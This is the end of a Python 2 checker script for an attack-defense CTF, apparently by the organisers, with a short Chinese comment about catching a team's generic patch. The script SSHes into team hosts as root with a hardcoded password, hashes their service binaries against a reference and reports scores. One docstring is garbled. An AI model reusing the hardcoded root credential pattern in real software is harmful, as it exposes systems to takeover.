        print_log(colored('[Error] in patch menu : ' + oip + '\n', 'red'),ip=oip)
        return 0   


    f.seek(0x4412,0)
    flag_str =f.read(22)
    #print flag_str
    if flag_str !='/home/tsctf/flag/flag\0':
        f.close()
        print_log(colored('[Error] in game->patch flag path : ' + oip + '\n', 'red'),ip=oip)
        return 0
    f.seek(0x1273,0)
    f_standard.seek(0x1273,0)
    standard_tmp = f_standard.read(0x28f0-0x1273)
    md5obj = hashlib.md5()
    tmp = f.read(0x28f0-0x1273)
    md5obj.update(tmp)
    hash_tmp = md5obj.hexdigest()
    md5obj = hashlib.md5()
    #tmp = f.read(0x28f0-0x1273)
    md5obj.update(standard_tmp)
    hash_standard = md5obj.hexdigest()    
    if (hash_tmp!=hash_standard):
        f.close()
        print_log(colored('[Error] in game->patch game code : ' + oip + '\n', 'red'),ip=oip)
        return 0        
    f.close()
    return 1
def check_thread(round):
    """
    function: cheinvalid literal for int() with base 10:ck every targeted ip
    """

    port = 40111#1022
    ipbase = '172.16.20.'
    team_num = 17

    check_result = []

    # if not debug:
    #    time.sleep(random.randint(10, 20))

    print_log(
        colored('================= Round %d ==================' % round, "green"))
    for i in range(1, team_num+1):
        ip = ipbase + str(i)
        print_log('check ip: ' + ip)
        check_count = 0
        file_check  = 1
        for i in range(5):
            """
            check 5 times for every ip, 
            if check fail more than three times, then check result is down
            """
            #ip = "127.0.0.1"
            #port = 2111
            single_check = check(ip, port)
            if single_check == 0:
                print_log("[check %d] address: %s result: successful" %
                          (i + 1, ip))
            elif single_check == 1:
                check_count += 1
                print_log("[check %d] address: %s result: failed" %
                          (i + 1, ip))
        # check shell
        # to determine whether a team uses common guard
        try:
            ssh_shell = ssh(host=ip, port = 1022,user='root', password='GA7E12EH2C3CFEBBD1G4',cache=False)
            ssh_shell.download(file_path,'./file/'+ip+'.bin')
            ssh_shell.close()
            #print os.path.getsize('pwn1')
            #print CalcMD5("DNS_Server_standard")
            #print CalcMD5('./file/'+ip+'.bin')
            if (CalcMD5("DNS_Server_standard")!= CalcMD5('./file/'+ip+'.bin')):
                if abs(os.path.getsize('DNS_Server_standard') - os.path.getsize('./file/'+ip+'.bin')) > 128:
                    print_log(colored('[Warning] find doubtful patch : ' + ip + '\n', 'red'),ip=ip)
                if(coding_check_level):
                    file_check = patch_check('./file/'+ip+'.bin',"DNS_Server_standard",ip)
                else:
                    print_log(
                        colored('[info] file size check ok: ' + ip + '\n', 'green'))
        except Exception as e:
            print_log(str(e))
            print_log(
                colored('[Error] cannnot connect %s by ssh' % ip, "yellow"))
    # upload check result into server
        if(file_check==1):
            print_log("[patch_check] address: %s result: successful" %(ip))
        else:
            print_log("[patch_check] address: %s result: failed" %(ip))    
        print_log("")   
        print check_count,file_check
        if ((check_count >= 2) | (file_check == 0)):
            check_result.append({'tid':ip.split('.')[-1],'qid': '3', 'state': 2})
        else:
            check_result.append({'tid':ip.split('.')[-1],'qid': '3', 'state': 0})   
        #print check_result
    try:
        #print json.dumps(check_result)
        upload("http://172.16.123.123/commapi/script/setServiceState",
               {'result': json.dumps(check_result)})
        #print json.dumps(check_result)
        pass
    except Exception as e:
        print_log('[HttpError] cannot connect to http server')
    print_log(str(check_result))
    print_log("")


def check_test():
    port = 2111
    ipbase = '172.16.10.'
    #ip = '10.210.103.168'
    check_result = []
    check_count = 0
    for i in range(5):
        single_check = check(ip, port)
        if single_check == 0:
            print_log("[check %d] address: %s result: successful" %
                      (i + 1, ip))
        elif single_check == 1:
            check_count += 1
            print_log("[check %d] address: %s result: failed" %
                      (i + 1, ip))
    print_log("")
    if check_count >= 3:
        check_result.append({'ip': '172.16.20.3', 'state': 1})
    else:
        check_result.append({'ip': '172.16.20.3', 'state': 0})

        # check shell
        # to determine whether a team uses common guard
    # upload check result into server
    try:
        upload("http://172.16.123.123/check_the_player.php",
               {'result': json.dumps(check_result)})
        print json.dumps(check_result)
        pass
    except Exception as e:
        print_log('[HttpError] cannot connect to http server')
    print_log(str(check_result))
    print_log("")


if __name__ == '__main__':

    round = 1
    if not os.path.exists('./checkresult/'):
        os.makedirs('./checkresult/')
    if not os.path.exists('./file/'):
        os.makedirs('./file/')

    while True:
        thread.start_new_thread(check_thread, (round, ))
        time.sleep(round_time)  # five minutes
        round += 1
'''
1. patch heap
2. login? 1.2.
3. serach
4. delete single
5. 

'''

Other

线下赛的时候在Checker机制中也发现了许多问题，对于通防的思路还是太窄，好在刚开始比赛的时候用size大小的方法+手工的方法查到了NeSE战队的通防，威逼利诱的情况下后来比赛中没有出现其他通防。